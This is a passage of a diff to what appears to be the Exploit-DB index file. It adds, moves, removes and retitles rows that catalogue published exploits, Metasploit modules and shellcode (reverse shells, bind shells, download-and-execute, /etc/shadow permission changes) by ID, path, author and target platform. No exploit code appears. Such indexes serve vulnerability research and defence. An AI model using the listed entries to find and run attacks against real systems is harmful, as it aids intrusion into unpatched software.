DEV Blogs Mu 1.2.6 Regular Subscriber HTML Injection Vulnerability",2011-09-26,knull,php,webapps,0 36167,platforms/php/webapps/36167.txt,"AdaptCMS 2.0.1 Cross Site Scripting And Information Disclosure Vulnerabilities",2011-09-26,"Stefan Schurtz",php,webapps,0 36168,platforms/php/webapps/36168.txt,"Serendipity Freetag-plugin <= 3.23 'serendipity[tagview]' Cross Site Scripting Vulnerability",2011-09-26,"Stefan Schurtz",php,webapps,0 -36169,platforms/multiple/remote/36169.rb,"HP Client Automation Command Injection",2015-02-24,metasploit,multiple,remote,3465 36170,platforms/php/webapps/36170.txt,"PunBB <= 1.3.6 'browse.php' Cross-Site Scripting Vulnerability",2011-09-26,Amir,php,webapps,0 36171,platforms/php/webapps/36171.txt,"Joomla! 'com_biitatemplateshop' Component 'groups' Parameter SQL Injection Vulnerability",2011-09-26,"BHG Security Group",php,webapps,0 36172,platforms/cfm/webapps/36172.txt,"Adobe ColdFusion 7 Multiple Cross Site Scripting Vulnerabilities",2011-09-27,MustLive,cfm,webapps,0 @@ -32641,7 +32643,11 @@ id,file,description,date,author,platform,type,port 36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0 +36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection Vulnerabilities",2015-03-04,"Brandon Perry",windows,webapps,0 +36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,metasploit,linux,remote,443 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service Vulnerability",2011-04-11,"Luigi Auriemma",windows,dos,0 +36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection Vulnerability",2011-10-19,"Yuri Goltsev",php,webapps,0 +36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0 36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 'mod' Parameter Cross Site Scripting Vulnerability",2011-10-06,"Stefan Schurtz",php,webapps,0 36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 'resolute.php' Information Disclosure Vulnerability",2011-10-07,"cr4wl3r ",php,webapps,0 36215,platforms/php/webapps/36215.txt,"Joomla! 'com_expedition' Component 'id' Parameter SQL Injection Vulnerability",2011-10-09,"BHG Security Center",php,webapps,0 @@ -32673,8 +32679,6 @@ id,file,description,date,author,platform,type,port 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 36242,platforms/php/webapps/36242.txt,"Wordpress Theme Photocrati 4.x.x - SQL Injection & XSS",2015-03-03,ayastar,php,webapps,0 36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar <= 1.1.4 - SQL Injection vulnerabilities",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 -36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection Vulnerability",2011-10-19,"Yuri Goltsev",php,webapps,0 -36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0 36246,platforms/multiple/remote/36246.txt,"Splunk <= 4.1.6 'segment' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Filip Palian",multiple,remote,0 36247,platforms/multiple/dos/36247.txt,"Splunk <= 4.1.6 Web component Remote Denial of Service Vulnerability",2011-10-20,"Filip Palian",multiple,dos,0 36248,platforms/php/webapps/36248.txt,"osCommerce Remote File Upload and File Disclosure Vulnerabilities",2011-10-20,indoushka,php,webapps,0 @@ -32690,8 +32694,6 @@ id,file,description,date,author,platform,type,port 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0 36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 'professor.php' Script Multiple SQL Injection Vulnerabilities",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 36260,platforms/windows/dos/36260.txt,"Opera Web Browser 11.52 Escape Sequence Stack Buffer Overflow Denial of Service Vulnerability",2011-10-28,"Marcel Bernhardt",windows,dos,0 -36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection Vulnerabilities",2015-03-04,"Brandon Perry",windows,webapps,0 -36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,metasploit,linux,remote,443 36264,platforms/php/remote/36264.rb,"Seagate Business NAS Unauthenticated Remote Command Execution",2015-03-04,metasploit,php,remote,80 36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80 36266,platforms/lin_amd64/dos/36266.c,"Linux Kernel IRET Instruction #SS Fault Handling - Crash PoC",2015-03-04,"Emeric Nasi",lin_amd64,dos,0 @@ -32707,10 +32709,10 @@ id,file,description,date,author,platform,type,port 36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd (55 Bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) 'str' Parameter Cross Site Scripting Vulnerability",2011-11-01,Isfahan,php,webapps,0 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 -36280,platforms/php/webapps/36280.txt,"Symphony <= 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0 -36281,platforms/php/webapps/36281.txt,"Symphony <= 2.2.3 symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 36282,platforms/php/webapps/36282.txt,"eFront 3.6.x Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-11-02,"High-Tech Bridge SA",php,webapps,0 36283,platforms/php/webapps/36283.txt,"Serendipity 1.5.5 'serendipity[filter][bp.ALT]' Parameter Cross Site Scripting Vulnerability",2011-11-03,"Stefan Schurtz",php,webapps,0 +36280,platforms/php/webapps/36280.txt,"Symphony <= 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0 +36281,platforms/php/webapps/36281.txt,"Symphony <= 2.2.3 symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 36284,platforms/asp/webapps/36284.txt,"CmyDocument Multiple Cross Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0 36285,platforms/windows/dos/36285.c,"Microsoft Windows TCP/IP Stack Reference Counter Integer Overflow Vulnerability",2011-11-08,anonymous,windows,dos,0 36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 'file' Parameter Local File Disclosure Vulnerability",2011-11-04,"Todor Donev",hardware,remote,0 @@ -32719,7 +32721,7 @@ id,file,description,date,author,platform,type,port 36289,platforms/php/webapps/36289.txt,"SmartJobBoard 'keywords' Parameter Cross Site Scripting Vulnerability",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 36290,platforms/php/webapps/36290.txt,"Admin Bot 'news.php' SQL Injection Vulnerability",2011-11-07,baltazar,php,webapps,0 36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 -36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Parameter Directory Traversal Vulnerability",2011-11-07,Buherátor,java,webapps,0 +36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Parameter Directory Traversal Vulnerability",2011-11-07,Buherátor,java,webapps,0 36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 'command_name' Parameter Remote Command Execution Vulnerability",2011-11-04,"Christophe de la Fuente",php,webapps,0 36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0 36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection Vulnerability",2011-11-08,Kalashinkov3,php,webapps,0 @@ -32739,7 +32741,6 @@ id,file,description,date,author,platform,type,port 36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash PoC",2015-03-08,"Loudiyi Mohamed",hardware,dos,0 36310,platforms/lin_x86-64/local/36310.txt,"Rowhammer: Linux Kernel Privilege Escalation PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer: NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 -36313,platforms/php/webapps/36313.txt,"webERP <= 4.3.8 Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36314,platforms/php/webapps/36314.txt,"webERP <= 4.3.8 reportwriter/ReportMaker.php reportid Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36315,platforms/php/webapps/36315.txt,"webERP <= 4.3.8 reportwriter/FormMaker.php ReportID Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 Cross Site Scripting Vulnerability",2011-11-17,"James webb",php,webapps,0 @@ -32813,34 +32814,41 @@ id,file,description,date,author,platform,type,port 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 'index.php' Multiple SQL Injection Vulnerabilities",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36385,platforms/php/webapps/36385.txt,"Joomla Simple Photo Gallery 1.0 - SQL injection",2015-03-16,"Moneer Masoud",php,webapps,0 36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Auth Bypass Vulnerability",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0 +36405,platforms/windows/dos/36405.txt,"Serv-U 11.1.0.3 - Denial of Service and Security Bypass Vulnerabilities",2011-12-05,"Luigi Auriemma",windows,dos,0 36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash PoC",2015-03-16,"Avinash Thapa",linux,local,0 +36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 index.php task Parameter XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0 36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0 36391,platforms/lin_x86/shellcode/36391.c,"Shellcode - linux/x86 - ROT13 encoded execve(""/bin/sh"") (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36392,platforms/windows/dos/36392.txt,"Intel Network Adapter Diagnostic Driver - IOCTL Handling Vulnerability",2015-03-14,"Glafkos Charalambous ",windows,dos,0 36393,platforms/lin_x86/shellcode/36393.c,"Shellcode - Linux/x86 - chmod 0777 /etc/shadow obfuscated (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36394,platforms/lin_x86/shellcode/36394.c,"Shellcode - linux/x86 - Obfuscated - map google.com to 127.1.1.1 (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36395,platforms/lin_x86/shellcode/36395.c,"Shellcode - linux/x86 - Obfuscated execve(""/bin/sh"") (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting Vulnerability",2011-12-31,6Scan,php,webapps,0 36397,platforms/lin_x86/shellcode/36397.c,"Shellcode - Linux/x86 - Reverse TCP Shell (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36398,platforms/lin_x86/shellcode/36398.c,"Shellcode - Linux/x86 - TCP Bind Shell (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0 -36402,platforms/asp/webapps/36402.txt,"Hero 3.69 'month' Parameter Cross Site Scripting Vulnerability",2011-12-01,"Gjoko Krstic",asp,webapps,0 -36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability",2011-12-02,"High-Tech Bridge SA",windows,dos,0 -36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability",2009-06-01,dividead,linux,dos,0 -36405,platforms/windows/dos/36405.txt,"Serv-U 11.1.0.3 - Denial of Service and Security Bypass Vulnerabilities",2011-12-05,"Luigi Auriemma",windows,dos,0 -36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 index.php task Parameter XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0 36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0 36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0 -36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0 36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0 +36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0 +36402,platforms/asp/webapps/36402.txt,"Hero 3.69 'month' Parameter Cross Site Scripting Vulnerability",2011-12-01,"Gjoko Krstic",asp,webapps,0 +36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability",2011-12-02,"High-Tech Bridge SA",windows,dos,0 +36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability",2009-06-01,dividead,linux,dos,0 36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200 +36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0 +36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0 +36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0 +36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 'windowed' Parameter Cross Site Scripting Vulnerability",2012-01-02,sonyy,php,webapps,0 +36486,platforms/php/webapps/36486.txt,"Tienda Virtual 'art_detalle.php' SQL Injection Vulnerability",2012-01-03,"Arturo Zamora",php,webapps,0 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0 36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation CSRF",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790 36420,platforms/windows/remote/36420.rb,"Adobe Flash Player PCRE Regex Vulnerability",2015-03-17,metasploit,windows,remote,0 36421,platforms/linux/remote/36421.rb,"Exim GHOST (glibc gethostbyname) Buffer Overflow",2015-03-18,"Qualys Corporation",linux,remote,25 +36783,platforms/windows/dos/36783.txt,"Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash PoC",2015-04-17,sajith,windows,dos,0 +36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,metasploit,multiple,remote,0 36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On - Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection Vulnerability",2015-03-18,"Han Sahin",java,webapps,9447 36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 @@ -32897,13 +32905,7 @@ id,file,description,date,author,platform,type,port 36476,platforms/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus '.cfg' File Memory Corruption Vulnerability",2011-12-21,"Vulnerability Research Laboratory",windows,local,0 36477,platforms/windows/remote/36477.py,"Bsplayer 2.68 - HTTP Response Exploit (Universal)",2015-03-24,"Fady Mohammed Osman",windows,remote,0 36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Shell Upload Vulnerability",2015-03-24,KedAns-Dz,php,webapps,0 -36480,platforms/multiple/remote/36480.rb,"Firefox Proxy Prototype Privileged Javascript Injection",2015-03-24,metasploit,multiple,remote,0 -36481,platforms/php/webapps/36481.txt,"WordPress TheCartPress Plugin 1.6 'OptionsPostsList.php' Cross Site Scripting Vulnerability",2011-12-31,6Scan,php,webapps,0 -36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 'err' Parameter Cross Site Scripting Vulnerability",2012-01-01,Net.Edit0r,php,webapps,0 -36483,platforms/php/webapps/36483.txt,"WordPress WP Live.php 1.2.1 's' Parameter Cross Site Scripting Vulnerability",2012-01-01,"H4ckCity Security Team",php,webapps,0 -36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 'q' Parameter Cross Site Scripting Vulnerability",2011-01-01,"H4ckCity Security Team",php,webapps,0 -36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 'windowed' Parameter Cross Site Scripting Vulnerability",2012-01-02,sonyy,php,webapps,0 -36486,platforms/php/webapps/36486.txt,"Tienda Virtual 'art_detalle.php' SQL Injection Vulnerability",2012-01-03,"Arturo Zamora",php,webapps,0 +36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0 36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 'path' Parameter Cross Site Scripting Vulnerability",2012-01-03,"The Evil Thinker",php,webapps,0 36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 'domain' Parameter Cross Site Scripting Vulnerability",2012-01-03,Atmon3r,php,webapps,0 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 'ddb' Parameter Cross Site Scripting Vulnerability",2012-01-04,"Jonathan Claudius",php,webapps,0 @@ -32923,7 +32925,6 @@ id,file,description,date,author,platform,type,port 36503,platforms/hardware/remote/36503.rb,"QNAP - Admin Shell via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,9993 36504,platforms/hardware/remote/36504.rb,"QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection",2015-03-26,"Patrick Pellegrino",hardware,remote,0 36505,platforms/windows/remote/36505.txt,"WebGate eDVR Manager - Stack Buffer Overflow",2015-03-26,"Praveen Darshanam",windows,remote,0 -36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0 36507,platforms/windows/remote/36507.txt,"Microsoft AntiXSS 3/4.0 Library Sanitization Module Security Bypass Vulnerability",2012-01-10,"Adi Cohen",windows,remote,0 36508,platforms/php/webapps/36508.txt,"VertrigoServ 2.25 'extensions.php' Script Cross Site Scripting Vulnerability",2012-01-05,"Stefan Schurtz",php,webapps,0 36509,platforms/php/webapps/36509.txt,"SQLiteManager 1.2.4 main.php dbsel Parameter XSS",2012-01-05,"Stefan Schurtz",php,webapps,0 @@ -32972,6 +32973,7 @@ id,file,description,date,author,platform,type,port 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 Multiple 'index.php' Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 36554,platforms/php/webapps/36554.txt,"Wordpress Plugin Slider Revolution <= 4.1.4 - Arbitrary File Download vulnerability",2015-03-30,"Claudio Viviani",php,webapps,0 +36747,platforms/linux/local/36747.c,"Fedora abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 36559,platforms/php/webapps/36559.txt,"Wordpress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0 @@ -32988,7 +32990,7 @@ id,file,description,date,author,platform,type,port 36572,platforms/php/webapps/36572.txt,"Toner Cart 'show_series_ink.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0 36573,platforms/php/webapps/36573.txt,"MMORPG Zone 'view_news.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0 36574,platforms/php/webapps/36574.txt,"Freelance Zone 'show_code.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0 -36575,platforms/multiple/webapps/36575.py,"JBoss AS versions 3, 4, 5, 6 - Remote Command Execution",2015-03-31,"Joo Filho Matos Figueiredo",multiple,webapps,0 +36575,platforms/multiple/webapps/36575.py,"JBoss AS versions 3_ 4_ 5_ 6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0 36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0 36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0 36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,metasploit,windows,remote,0 @@ -33014,6 +33016,7 @@ id,file,description,date,author,platform,type,port 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 'connector.asp' Arbitrary File Upload Vulnerability",2012-01-21,HELLBOY,asp,webapps,0 36600,platforms/php/webapps/36600.txt,"Wordpress Business Intelligence Plugin - SQL injection",2015-04-02,"Jagriti Sahu",php,webapps,80 36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 +36620,platforms/php/webapps/36620.txt,"WordPress YouSayToo auto-publishing Plugin 1.0 'submit' Parameter Cross Site Scripting Vulnerability",2012-01-24,"H4ckCity Security Team",php,webapps,0 36602,platforms/windows/remote/36602.html,"Webgate WESP SDK 1.2 ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36604,platforms/windows/remote/36604.html,"WebGate WinRDS 2.0.8 PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 @@ -33030,7 +33033,6 @@ id,file,description,date,author,platform,type,port 36617,platforms/php/webapps/36617.txt,"WordPress VideoWhisper Video Presentation 3.31.17 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0 -36620,platforms/php/webapps/36620.txt,"WordPress YouSayToo auto-publishing Plugin 1.0 'submit' Parameter Cross Site Scripting Vulnerability",2012-01-24,"H4ckCity Security Team",php,webapps,0 36621,platforms/php/webapps/36621.txt,"glFusion 1.x SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0 36622,platforms/windows/dos/36622.pl,"UltraPlayer 2.112 Malformed '.avi' File Denial of Service Vulnerability",2012-01-24,KedAns-Dz,windows,dos,0 36623,platforms/php/webapps/36623.txt,"Ultimate Locator 'radius' Parameter SQL Injection Vulnerability",2012-01-24,"Robert Cooper",php,webapps,0 @@ -33043,7 +33045,7 @@ id,file,description,date,author,platform,type,port 36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component Multiple SQL Injection Vulnerabilities",2012-01-26,the_cyber_nuxbie,php,webapps,0 36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x 'border' Parameter Cross Site Scripting Vulnerability",2012-01-26,"Bret Hawk",php,webapps,0 36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x 'shopping_url' Parameter Cross Site Scripting Vulnerability",2012-01-26,sonyy,php,webapps,0 -36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0 +36633,platforms/linux/dos/36633.txt,"Wireshark Buffer Underflow and Denial of Service Vulnerabilities",2012-01-10,"Laurent Butti",linux,dos,0 36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Include and SQL Injection Vulnerabilities",2012-01-28,the_cyber_nuxbie,php,webapps,0 36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Vulnerability",2012-01-30,the_cyber_nuxbie,php,webapps,0 36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component 'catid' Parameter Remote SQL Injection Vulnerability",2012-01-31,the_cyber_nuxbie,php,webapps,0 @@ -33077,17 +33079,17 @@ id,file,description,date,author,platform,type,port 36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 DomainConfig.do operation Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0 36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 jsp/AddDC.jsp domainName Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0 36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 'administrator.php' Cross Site Scripting Vulnerability",2012-02-07,"Chokri B.A",php,webapps,0 -36669,platforms/linux/dos/36669.txt,"Apache APR 1.4.x - Hash Collision Denial Of Service Vulnerability",2012-01-05,"Moritz Muehlenhoff",linux,dos,0 +36669,platforms/linux/dos/36669.txt,"Apache APR Hash Collision Denial Of Service Vulnerability",2012-01-05,"Moritz Muehlenhoff",linux,dos,0 36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0 36671,platforms/php/webapps/36671.txt,"WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability",2015-04-08,"Claudio Viviani",php,webapps,80 -36672,platforms/lin_x86/shellcode/36672.asm,"Shellcode: Linux x86 Egg-hunter (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 -36673,platforms/lin_x86/shellcode/36673.py,"Shellcode: Linux x86 Typewriter Shellcode Generator",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 -36674,platforms/php/webapps/36674.txt,"Shareaholic 7.6.0.3 Persistent XSS",2015-04-08,"Kacper Szurek",php,webapps,80 -36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 Multiple Blind SQL Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 -36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 +36672,platforms/lin_x86/shellcode/36672.asm,"Linux x86 Egg-hunter (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 +36673,platforms/lin_x86/shellcode/36673.py,"Linux x86 Typewriter Shellcode Generator",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 +36674,platforms/php/webapps/36674.txt,"Shareaholic 7.6.0.3 - XSS",2015-04-08,"Kacper Szurek",php,webapps,80 +36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injection 